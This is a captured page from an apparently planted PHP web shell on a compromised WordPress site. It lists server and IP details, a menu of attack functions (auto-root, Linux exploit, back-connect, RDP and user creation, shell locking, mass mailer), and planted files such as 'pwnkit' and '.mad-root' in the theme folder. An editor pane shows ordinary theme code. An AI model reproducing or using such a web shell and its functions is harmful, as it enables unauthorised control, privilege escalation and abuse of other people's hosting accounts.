Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
mindscape /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
class-tgm-plugin-activation.ph...
121.85
KB
-rw-r--r--
customizer-headers.php
76.23
KB
-rw-r--r--
defaults.php
40.99
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
safari-polyfills.php
2.66
KB
-rw-r--r--
template-defaults.php
13.85
KB
-rw-r--r--
template-functions.php
6.12
KB
-rw-r--r--
theme-translations.php
23
B
-rw-r--r--
translations.php
21.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : template-functions.php
<?php use ColibriWP\Theme\Defaults; function mindscape_theme_print_footer_copyright() { ?> <div class="h-global-transition-all"> <p> © <?php echo date( 'Y' ); ?> <?php bloginfo( 'blogname' ); ?>. <?php printf( __( 'Created with ❤️ using WordPress and %s theme.', 'mindscape' ), '<a target="_blank" rel="noreferrer" href="https://kubiobuilder.com/">Mindscape</a>' ); ?> </p> </div> <?php } function mindscape_theme_print_menu_footer_copyright() { ?> <div class="h-global-transition-all"> © <?php echo date( 'Y' ); ?> <?php bloginfo( 'blogname' ); ?> </div> <?php } function mindscape_print_color_scheme() { $colors = Defaults::get( 'colors' ); $color_vars = array(); foreach ( $colors as $color => $value ) { list( $r, $g, $b ) = $value; $color_vars[] = "--{$color}: {$r},{$g},{$b}"; } ?> <style id="<?php esc_attr( get_template() ); ?>-<?php esc_attr( get_stylesheet() ); ?>-color-scheme"> :root { <?php echo implode( ';', $color_vars ); ?> } </style> <?php } function mindscape_print_page_title() { $title = ''; if ( is_404() ) { $title = __( 'Page not found', 'mindscape' ); } elseif ( is_search() ) { $title = sprintf( __( 'Search Results for “%s”', 'mindscape' ), get_search_query() ); } elseif ( is_home() ) { if ( is_front_page() ) { $title = get_bloginfo( 'name' ); } else { $title = single_post_title( '', false ); } } elseif ( is_archive() ) { if ( is_post_type_archive() ) { $title = post_type_archive_title( '', false ); } else { $title = get_the_archive_title(); } } elseif ( is_single() ) { $title = get_bloginfo( 'name' ); global $post; if ( $post ) { // apply core filter $title = apply_filters( 'single_post_title', $post->post_title, $post ); } } else { $title = get_the_title(); } echo $title; } function mindscape_post_comments_template( $form = '' ) { return get_template_directory() . '/template-parts/blog/comments.php'; } function mindscape_post_comments( $attrs = array() ) { ob_start(); if ( comments_open( get_the_ID() ) ) { mindscape_theme()->setState( 'comments_template_data', $attrs ); add_filter( 'comments_template', 'mindscape_post_comments_template' ); comments_template(); remove_filter( 'comments_template', 'mindscape_post_comments_template' ); } else { echo $attrs['disabled']; } $content = ob_get_clean(); echo $content; } function mindscape_post_excerpt_length( $length ) { $length = mindscape_theme()->getState( 'post_excerpt_length', $length ); mindscape_theme()->deleteState( 'post_excerpt_length' ); return $length; } function mindscape_post_excerpt( $attrs = array() ) { if ( isset( $attrs['max_length'] ) ) { mindscape_theme()->setState( 'post_excerpt_length', $attrs['max_length'] ); } add_filter( 'excerpt_length', 'mindscape_post_excerpt_length' ); echo get_the_excerpt(); mindscape_theme()->deleteState( 'post_excerpt_length' ); remove_filter( 'excerpt_length', 'mindscape_post_excerpt_length' ); } function mindscape_post_missing_featured_image_class() { if ( has_post_thumbnail() ) { echo ''; } else { echo 'kubio-post-featured-image--image-missing'; } } function mindscape_get_navigation_button_link( $prev = false ) { if ( is_single() ) { mindscape_get_single_post_nav_button_link( $prev ); } mindscape_get_archive_post_nav_button_link( $prev ); } function mindscape_get_single_post_nav_button_link( $prev = false ) { $post = get_adjacent_post( false, '', $prev, 'category' ); echo esc_url( get_permalink( $post ) ); } function mindscape_get_archive_post_nav_button_link( $prev = false ) { if ( $prev ) { echo get_previous_posts_page_link(); } else { echo get_next_posts_page_link(); } } function mindscape_has_pagination() { if ( is_single() ) { $prev_post = get_adjacent_post(); $next_post = get_adjacent_post( false, ',true' ); return ( $prev_post instanceof WP_Post || $next_post instanceof WP_Post ); } global $wp_query; $total = isset( $wp_query->max_num_pages ) ? $wp_query->max_num_pages : 1; return ( $total > 1 ); } function mindscape_has_pagination_button( $prev = false ) { if ( is_single() ) { $post = get_adjacent_post( false, '', $prev, 'category' ); return ( $post instanceof WP_Post ); } global $wp_query; $total = isset( $wp_query->max_num_pages ) ? $wp_query->max_num_pages : 1; $current = get_query_var( 'paged' ) ? (int) get_query_var( 'paged' ) : 1; if ( $prev ) { return ( $current > 1 ); } else { return ( intval( $current ) < intval( $total ) ); } } function mindscape_pagination_numbers() { echo paginate_links( array( 'prev_next' => false, 'show_all' => false, ) ); } function mindscape_tags_list( $placeholder = '' ) { $post_tags = get_the_tags(); if ( ! empty( $post_tags ) ) { $output = '<div>'; foreach ( $post_tags as $tag ) { $output .= '<a href="' . esc_url( get_category_link( $tag->term_id ) ) . '">' . $tag->name . '</a>'; } $output = trim( $output ); $output .= '</div>'; echo $output; } else { echo $placeholder; } } function mindscape_categories_list( $placeholder = '' ) { $categories = get_the_category(); if ( ! empty( $categories ) ) { $output = '<div>'; foreach ( $categories as $category ) { $output .= '<a href="' . esc_url( get_category_link( $category->term_id ) ) . '">' . $category->name . '</a>'; } $output = trim( $output ); $output .= '</div>'; echo $output; } else { echo $placeholder; } } function mindscape_print_archive_entry_class( $class = '' ) { $classes = array( 'post-list-item', 'h-col-xs-12', 'space-bottom' ); $classes = array_merge( $classes, explode( ' ', $class ) ); $classes = get_post_class( $classes ); $default = get_theme_mod( 'blog_posts_per_row', Defaults::get( 'blog_posts_per_row' ) ); $postsPerRow = max( 1, apply_filters( 'colibriwp_posts_per_row', $default ) ); $classes[] = 'h-col-sm-12 h-col-md-' . ( 12 / intval( $postsPerRow ) ); $classes = apply_filters( 'colibriwp_archive_entry_class', $classes ); $classesText = implode( ' ', $classes ); echo esc_attr( $classesText ); }
Close